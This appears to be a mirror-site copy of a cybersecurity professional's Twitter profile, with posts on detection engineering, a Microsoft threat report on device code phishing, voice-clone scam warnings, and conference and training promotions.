Olivia
Online
Murphy the Malware Lab
@MalwareLabMurph
Insight from a cybersecurity professional and his faithful Chocolate Labrador. Opinions presented here do not reflect the views of any company or client.
North Carolina, USA
Joined May 2021
209 Following
89 Followers
897 Posts
Pinned Tweet
Hello World! I decided to start this Twitter account to keep up with current cybersecurity research, analysis, and threat intelligence, as well as interact with other professionals in the field. I’ll do my best to signal-boost posts that I feel will benefit the community!
Microsoft Edge loads all your saved passwords into memory in cleartext — even when you’re not using them.
Microsoft announced today that it will integrate Sysmon natively into Windows 11 and Windows Server 2025 next year, making it unnecessary to deploy the standalone Sysinternals tools.
https://t.co/aomlKYXm5Q
Apparently I’ve avoided this app to the point where it no longer is confident I’m a human… or perhaps my alter-ego is more convincing than I realized? 🤖🐶
People know me for strong opinions on offensive security, threat intel, malware devs, C2 frameworks.
Now it’s time to piss off the defenders.
Process Creation logs (Event ID 4688) are the only sane answer here.
Not DNS query logs. Not PCAPs. Not network logs with login events and failed attempts. That’s just low-context noise or IOC-driven retro-hunting.
PCAPs are fine if you like staring at packets for hours to find a weird TLS handshake. DNS logs? Useful if the attacker was dumb enough to use known domains.
4688 gives you actual behavior. Suspicious subprocesses. Malicious chains. New stuff. Generic patterns.
You can have a different opinion. Doesn’t make it less wrong.
I’m still here!!! The burnout has been real, but every now and then I see a glimmer of light when somebody asks me about a real cybersecurity topic. 😌
Trying to do my obligatory semi-regular login and doom scrolling… this place still as toxic as i remember? ☠️
Microsoft Threat Intelligence Center discovered an active and successful device code phishing campaign by a threat actor we track as Storm-2372. Storm-2372’s targets include governments, NGOs, IT services and technology, defense, telecoms, health, higher education, and energy/oil and gas in Europe, North America, Africa, and the Middle East. Microsoft assesses with medium confidence that Storm-2372 aligns with Russian interests, victimology, and tradecraft.
Our ongoing investigation indicates that this campaign has been active since August 2024, with the actor creating lures that resemble messaging app experiences including WhatsApp, Signal, and Microsoft Teams. In device code phishing, threat actors exploit the device code authentication flow to capture authentication tokens, which they then use to access target accounts, and further gain access to data and other services that the compromised account has access to.
Read our research on the active threat represented by Storm-2372 and other threat actors exploiting device code phishing techniques, and get detection and mitigation guidance: https://t.co/D0FHTJVuGF
ICYMI: Trump administration axed all advisory committee members in DHS, including the people that make up the Cybersecurity and Infrastructure Security Agency's (CISA) Cyber Safety Review Board (CSRB). https://t.co/MinZKNK5LP
We're just two weeks away from the SANS CTI Summit, one of my favorite conferences of the year! I've seen several presentation drafts, and they are 🔥. Register today to join Live Online (free!) or in-person in Alexandria, VA!
➡️ Register: https://t.co/uBkLbdD167
@sansforensics
Admittedly I’ve been quiet on here lately due to general holiday hectic household, but I always recommend and make it a point to complete this challenge every December!
#AdventOfCyber is HERE! 🚨🎅
🔗 https://t.co/N37yYGq4Gb
Take on daily beginner-friendly challenges throughout December to be in with the chance of winning from our $100,000 prize draw 🎁🎄
#AdventOfCyber is HERE! 🚨🎅
🔗 https://t.co/N37yYGq4Gb
Take on daily beginner-friendly challenges throughout December to be in with the chance of winning from our $100,000 prize draw 🎁🎄
BEN SAID I COULD DO A GIVEAWAY TOO 🥳
HackingHub Black Friday deal: https://t.co/Uf3mW11mcR
$39 for lifetime access ♾️
OR
$19 for a month trial ⏰
AND I can match his giveaway--
2️⃣ WINNERS (1 each)
- Full cert bundle
- Lifetime access
To enter: ↪️ retweet and reply w/ 🦃
📢 The Github Infosec Black Friday 2024 edtion is out!! Already some good deals here 👇
https://t.co/1QwI2QCygb
Very cool! Excited to explore this further at work!
I created the first draft of a website for the EDR telemetry project to help people quickly compare vendor telemetry visibility. What do you think about it? Are there any specific features you want to see for the website?
Built with ChatGPT 4o with canvas (wanted to test it out😂)
EDR Telemetry project 🔗: https://t.co/8DmXzffYVC
Topic that arose while discussing Kindergarten career day: anybody have experience/resources on how to explain InfoSec to children? Would be intrigued to see any resources/talks… otherwise I may just need to make my own… 🤔
What people often overlook in #DetectionEngineering is that there’s no "one-size-fits-all" rule to detect a threat. It depends on your goals.
How specific should the rule be? Are you tracking a threat actor, detecting the tool/malware, or focusing on the technique? Should it be based on code, content, form, or metadata?
Just like in art, you can create an abstract, impressionist, or realistic painting of the same subject, and all can be masterpieces in their own right
If your family hasn’t received a phone call from “family” saying they’ve “been in an accident and need money for bail”, they likely will in the next few years.
This AI voice clone scam is so easy to make and I’ve had folks left and right telling me they’re getting these calls.
Last Seen Users on Sotwe
Produk Lokal Indo
Seen from Indonesia
Queen Roro🔞
Seen from Germany
emel
Seen from Turkey
Derya
Seen from Turkey
Handjob addict 🔞 Masturbation
Seen from Singapore
فضائح عربية 🔞 (www.bb5.site👉🏻)
Hùng Dũng
Seen from Vietnam
The red. สามีน้องอร. ใหม่
Seen from Thailand
Sandy
Seen from India
GM pass
Seen from Indonesia
Most Popular Users
Elon Musk 
@elonmusk
240.3M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.6M followers
Cristiano Ronaldo
@cristiano
109.6M followers
Narendra Modi
@narendramodi
106.9M followers
Rihanna
@rihanna
97.4M followers
NASA
@nasa
92.1M followers
Justin Bieber
@justinbieber
90.7M followers
KATY PERRY
@katyperry
87.2M followers
Taylor Swift
@taylorswift13
81M followers
Lady Gaga
@ladygaga
72.5M followers
Kim Kardashian
@kimkardashian
69.5M followers
Virat Kohli
@imvkohli
69.1M followers
YouTube
@youtube
68.6M followers
Bill Gates
@billgates
63.6M followers
The Ellen Show
@theellenshow
62.5M followers
CNN
@cnn
61.9M followers
Neymar Jr
@neymarjr
61.8M followers
X
@x
60.9M followers
Selena Gomez
@selenagomez
60.3M followers